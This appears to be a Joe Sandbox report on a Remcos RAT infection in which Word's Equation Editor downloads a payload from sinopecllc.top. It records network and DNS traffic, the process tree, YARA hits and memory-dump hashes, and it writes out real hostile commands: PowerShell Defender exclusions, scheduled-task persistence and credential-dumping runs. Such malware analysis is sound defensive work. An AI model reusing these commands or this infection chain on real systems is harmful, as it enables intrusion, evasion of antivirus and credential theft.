                        Jul 1, 2024 13:58:11.884325027 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.884334087 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.884360075 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.884393930 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.884408951 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.884428978 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.884460926 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.884506941 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.884530067 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.884562969 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.884597063 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.884609938 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.884629965 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.884664059 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.884677887 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.884697914 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.884732962 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.884746075 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.884766102 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.884798050 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.884829998 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.884845018 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.884864092 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.884898901 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.884947062 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.957073927 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.957104921 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.957184076 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.957413912 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.957447052 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.957480907 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.957498074 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.957524061 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.957571030 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.957617044 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.957623959 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.957659006 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.957691908 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.957742929 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.957742929 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.957777023 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.957808971 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.957825899 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.957839012 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.957871914 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.957906008 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.957917929 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.957940102 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.957973003 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.958018064 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.958069086 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.958102942 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.958137035 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.958169937 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.958185911 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.958221912 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.958256006 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.958290100 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.958303928 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.958321095 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.958374977 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.958409071 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.958430052 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.958441973 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.958475113 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.958524942 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.958528996 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.958563089 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.958596945 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.958632946 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.958643913 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.958688974 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.958718061 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.958734035 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.958769083 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.958801985 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.958851099 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.958853960 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.958909035 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.958940983 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.958976030 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.958992004 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.959008932 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.959063053 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.959093094 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.959109068 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.959126949 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.959160089 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.959172010 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.959211111 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.959244967 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.959278107 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.959291935 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.959312916 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.959362030 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.959398985 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.959404945 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.959433079 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.959466934 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.959511042 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.959515095 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.959567070 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.959600925 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.959635019 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.959646940 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.959667921 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.959702969 CEST19804916680.85.154.121192.168.2.22
                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                        Jul 1, 2024 13:58:01.120873928 CEST | 52917 | 53 | 192.168.2.22 | 8.8.8.8
                        Jul 1, 2024 13:58:01.131447077 CEST | 53 | 52917 | 8.8.8.8 | 192.168.2.22
                        Jul 1, 2024 13:58:07.391405106 CEST | 62751 | 53 | 192.168.2.22 | 8.8.8.8
                        Jul 1, 2024 13:58:07.427586079 CEST | 53 | 62751 | 8.8.8.8 | 192.168.2.22
                        Jul 1, 2024 13:58:09.544725895 CEST | 57893 | 53 | 192.168.2.22 | 8.8.8.8
                        Jul 1, 2024 13:58:09.553723097 CEST | 53 | 57893 | 8.8.8.8 | 192.168.2.22
                        Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                        Jul 1, 2024 13:58:01.120873928 CEST | 192.168.2.22 | 8.8.8.8 | 0x5aea | Standard query (0) | sinopecllc.top | A (IP address) | IN (0x0001) | false
                        Jul 1, 2024 13:58:07.391405106 CEST | 192.168.2.22 | 8.8.8.8 | 0x8787 | Standard query (0) | antfly50.sytes.net | A (IP address) | IN (0x0001) | false
                        Jul 1, 2024 13:58:09.544725895 CEST | 192.168.2.22 | 8.8.8.8 | 0xeeb5 | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
                        Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                        Jul 1, 2024 13:58:01.131447077 CEST | 8.8.8.8 | 192.168.2.22 | 0x5aea | No error (0) | sinopecllc.top | | 31.192.235.145 | A (IP address) | IN (0x0001) | false
                        Jul 1, 2024 13:58:07.427586079 CEST | 8.8.8.8 | 192.168.2.22 | 0x8787 | No error (0) | antfly50.sytes.net | | 80.85.154.121 | A (IP address) | IN (0x0001) | false
                        Jul 1, 2024 13:58:09.553723097 CEST | 8.8.8.8 | 192.168.2.22 | 0xeeb5 | No error (0) | geoplugin.net | | 178.237.33.50 | A (IP address) | IN (0x0001) | false
                        • sinopecllc.top
                        • geoplugin.net
                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        0 | 192.168.2.22 | 49164 | 31.192.235.145 | 80 | 3240 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                        Timestamp | Bytes transferred | Direction | Data
                        Jul 1, 2024 13:58:01.156550884 CEST | 309 | OUT | GET /plug.scr HTTP/1.1
                        Accept: */*
                        Accept-Encoding: gzip, deflate
                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                        Host: sinopecllc.top
                        Connection: Keep-Alive
                        Jul 1, 2024 13:58:01.770646095 CEST | 1236 | IN | HTTP/1.1 200 OK
                        Server: nginx
                        Date: Mon, 01 Jul 2024 11:58:01 GMT
                        Content-Type: application/x-silverlight
                        Content-Length: 1140744
                        Connection: keep-alive
                        Last-Modified: Mon, 01 Jul 2024 02:59:13 GMT
                        ETag: "116808-61c26c839c3ba"
                        Accept-Ranges: bytes
                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELf03 @@ @L3O@26` H.text `.rsrc@@@.reloc`0@B3H\2|Q^}((*0+,{+,{o(*0(ss}({o{( o!{o"{o#o${o#( o%{o&{rpo'to({ B6s)o*{rpo+{ > ?s,o-{o.{o/"@"PAs0(1(2r1po'


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        1 | 192.168.2.22 | 49167 | 178.237.33.50 | 80 | 3704 | C:\Users\user\AppData\Roaming\plugman23456.scr
                        Timestamp | Bytes transferred | Direction | Data
                        Jul 1, 2024 13:58:09.588259935 CEST | 71 | OUT | GET /json.gp HTTP/1.1
                        Host: geoplugin.net
                        Cache-Control: no-cache
                        Jul 1, 2024 13:58:10.268413067 CEST | 1170 | IN | HTTP/1.1 200 OK
                        date: Mon, 01 Jul 2024 11:58:10 GMT
                        server: Apache
                        content-length: 962
                        content-type: application/json; charset=utf-8
                        cache-control: public, max-age=300
                        access-control-allow-origin: *
                        Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"0ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}



                        Target ID:0
                        Start time:07:57:56
                        Start date:01/07/2024
                        Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                        Wow64 process (32bit):false
                        Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                        Imagebase:0x13f080000
                        File size:1'423'704 bytes
                        MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:false

                        Target ID:2
                        Start time:07:57:57
                        Start date:01/07/2024
                        Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                        Wow64 process (32bit):true
                        Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                        Imagebase:0x400000
                        File size:543'304 bytes
                        MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:5
                        Start time:07:58:01
                        Start date:01/07/2024
                        Path:C:\Users\user\AppData\Roaming\plugman23456.scr
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\AppData\Roaming\plugman23456.scr"
                        Imagebase:0xfb0000
                        File size:1'140'744 bytes
                        MD5 hash:28F77C9AF8CB3EA886714BBFC8326635
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.378816554.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000005.00000002.378816554.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000005.00000002.378816554.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                        Antivirus matches:
                        • Detection: 100%, Avira
                        • Detection: 100%, Joe Sandbox ML
                        Reputation:low
                        Has exited:true

                        Target ID:6
                        Start time:07:58:02
                        Start date:01/07/2024
                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\plugman23456.scr"
                        Imagebase:0x930000
                        File size:427'008 bytes
                        MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:8
                        Start time:07:58:03
                        Start date:01/07/2024
                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\znlzneAxBVd.exe"
                        Imagebase:0x930000
                        File size:427'008 bytes
                        MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:9
                        Start time:07:58:03
                        Start date:01/07/2024
                        Path:C:\Windows\SysWOW64\schtasks.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\znlzneAxBVd" /XML "C:\Users\user\AppData\Local\Temp\tmpF0B6.tmp"
                        Imagebase:0xc30000
                        File size:179'712 bytes
                        MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:12
                        Start time:07:58:05
                        Start date:01/07/2024
                        Path:C:\Users\user\AppData\Roaming\plugman23456.scr
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\AppData\Roaming\plugman23456.scr"
                        Imagebase:0xfb0000
                        File size:1'140'744 bytes
                        MD5 hash:28F77C9AF8CB3EA886714BBFC8326635
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.885917708.00000000006F4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.886068183.0000000000E9F000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.885963497.0000000000748000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:low
                        Has exited:false

                        Target ID:13
                        Start time:07:58:08
                        Start date:01/07/2024
                        Path:C:\Windows\System32\taskeng.exe
                        Wow64 process (32bit):false
                        Commandline:taskeng.exe {8CF74EAD-4204-4C1F-8614-11C7F9468804} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
                        Imagebase:0xff6a0000
                        File size:464'384 bytes
                        MD5 hash:65EA57712340C09B1B0C427B4848AE05
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:false

                        Target ID:15
                        Start time:07:58:09
                        Start date:01/07/2024
                        Path:C:\Users\user\AppData\Roaming\znlzneAxBVd.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Users\user\AppData\Roaming\znlzneAxBVd.exe
                        Imagebase:0x1170000
                        File size:1'140'744 bytes
                        MD5 hash:28F77C9AF8CB3EA886714BBFC8326635
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Antivirus matches:
                        • Detection: 100%, Avira
                        • Detection: 100%, Joe Sandbox ML
                        Reputation:low
                        Has exited:true

                        Target ID:16
                        Start time:07:58:10
                        Start date:01/07/2024
                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\znlzneAxBVd.exe"
                        Imagebase:0xea0000
                        File size:427'008 bytes
                        MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:18
                        Start time:07:58:10
                        Start date:01/07/2024
                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\znlzneAxBVd.exe"
                        Imagebase:0xea0000
                        File size:427'008 bytes
                        MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:20
                        Start time:07:58:11
                        Start date:01/07/2024
                        Path:C:\Windows\SysWOW64\schtasks.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\znlzneAxBVd" /XML "C:\Users\user\AppData\Local\Temp\tmpE15.tmp"
                        Imagebase:0x470000
                        File size:179'712 bytes
                        MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:21
                        Start time:07:58:11
                        Start date:01/07/2024
                        Path:C:\Users\user\AppData\Roaming\plugman23456.scr
                        Wow64 process (32bit):true
                        Commandline:C:\Users\user\AppData\Roaming\plugman23456.scr /stext "C:\Users\user\AppData\Local\Temp\bhyzucyduxfccvbqstsgmdbbressguvzg"
                        Imagebase:0xfb0000
                        File size:1'140'744 bytes
                        MD5 hash:28F77C9AF8CB3EA886714BBFC8326635
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true

                        Target ID:22
                        Start time:07:58:11
                        Start date:01/07/2024
                        Path:C:\Users\user\AppData\Roaming\plugman23456.scr
                        Wow64 process (32bit):true
                        Commandline:C:\Users\user\AppData\Roaming\plugman23456.scr /stext "C:\Users\user\AppData\Local\Temp\ejlrnu"
                        Imagebase:0xfb0000
                        File size:1'140'744 bytes
                        MD5 hash:28F77C9AF8CB3EA886714BBFC8326635
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true

                        Target ID:23
                        Start time:07:58:12
                        Start date:01/07/2024
                        Path:C:\Users\user\AppData\Roaming\plugman23456.scr
                        Wow64 process (32bit):true
                        Commandline:C:\Users\user\AppData\Roaming\plugman23456.scr /stext "C:\Users\user\AppData\Local\Temp\odrcnntyd"
                        Imagebase:0xfb0000
                        File size:1'140'744 bytes
                        MD5 hash:28F77C9AF8CB3EA886714BBFC8326635
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true

                        Target ID:25
                        Start time:07:58:16
                        Start date:01/07/2024
                        Path:C:\Users\user\AppData\Roaming\znlzneAxBVd.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\AppData\Roaming\znlzneAxBVd.exe"
                        Imagebase:0x1170000
                        File size:1'140'744 bytes
                        MD5 hash:28F77C9AF8CB3EA886714BBFC8326635
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000019.00000002.396020237.0000000000914000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000019.00000002.395655089.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000019.00000002.395655089.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000019.00000002.395655089.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                        • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000019.00000002.395655089.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                        • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000019.00000002.395655089.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                        Reputation:low
                        Has exited:true

                        Target ID:26
                        Start time:07:58:21
                        Start date:01/07/2024
                        Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                        Wow64 process (32bit):true
                        Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                        Imagebase:0x400000
                        File size:543'304 bytes
                        MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:false

                          Memory Dump Source
                          • Source File: 00000002.00000002.363969598.000000000030F000.00000004.00000020.00020000.00000000.sdmp, Offset: 0030F000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_30f000_EQNEDT32.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4ab0effaf83b610f266091abd09576752d8d69936670e80b12dff036acafe698
                          • Instruction ID: 4869490d4a839514d571ca361913754b4ed8b4f3aa09404bfa33b4245a2c3e31
                          • Opcode Fuzzy Hash: 4ab0effaf83b610f266091abd09576752d8d69936670e80b12dff036acafe698
                          • Instruction Fuzzy Hash: 7FD1656240F7C09EE3078B3888256967F729E63264B1F85EBC8C4DF5B3D6194D0AC762
                          Memory Dump Source
                          • Source File: 00000002.00000002.363969598.000000000030F000.00000004.00000020.00020000.00000000.sdmp, Offset: 0030F000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_30f000_EQNEDT32.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: df1d4980a34d2a4f7790949c5da749cebc5e8a53a6bf5f81bd301555b0c237cc
                          • Instruction ID: 1610e3c1dd3016885e6f1da896c1ad31fec9916136644700e8d85c0639c5c890
                          • Opcode Fuzzy Hash: df1d4980a34d2a4f7790949c5da749cebc5e8a53a6bf5f81bd301555b0c237cc
                          • Instruction Fuzzy Hash: C1C1896544E7C19FC71B8B74886A992BFB1AE6321430F85DBC4C6CF5B3D228494AC732

                          Execution Graph

                          Execution Coverage:17.3%
                          Dynamic/Decrypted Code Coverage:100%
                          Signature Coverage:13.3%
                          Total number of Nodes:135
                          Total number of Limit Nodes:6
                          execution_graph (rendered graph; edge list omitted): entry nodes d704a5 and d701a2 dispatch through d700d4 to d72c31/d72c7d/d72c80 (12 API calls), which reach the helper pairs 1bfa2c/1bfa38 (CreateProcessA), 1bf571/1bf578 (VirtualAllocEx), 1bf698/1bf6a0 (WriteProcessMemory), 1bf7f9/1bf800 (ReadProcessMemory), 1bf441/1bf448 (Wow64SetThreadContext) and 1bf350/1bf358 (ResumeThread)
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID: (
                          • API String ID: 0-3887548279
                          • Opcode ID: 9cadef6b35a0985e0a254907979c7d8bf8f9fa792ad5837dd2819793fd1da340
                          • Instruction ID: f806004a7af57d687860113a5606dfccae29164a6bea35c4c23fba5de29da0a5
                          • Opcode Fuzzy Hash: 9cadef6b35a0985e0a254907979c7d8bf8f9fa792ad5837dd2819793fd1da340
                          • Instruction Fuzzy Hash: 4B111C74C0E259CBCB24CF64D8443FCB6B8AB1A305F50A096D08EA2192E7348BC5EF21
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c9d2cfd080ce5afaf35c90a1d58e6aca44a9e41ca4faff6ecacaf89745bf70ad
                          • Instruction ID: 238c330d84e0ae0807e9648883dc2a04b9961ee9be55e1b549c526e9d57f4dbc
                          • Opcode Fuzzy Hash: c9d2cfd080ce5afaf35c90a1d58e6aca44a9e41ca4faff6ecacaf89745bf70ad
                          • Instruction Fuzzy Hash: 0C41C974909268CFCB24CF64D8447E8BBB5AB4A315F14D1DAC44EA7292E7309BC5EF60
                          Memory Dump Source
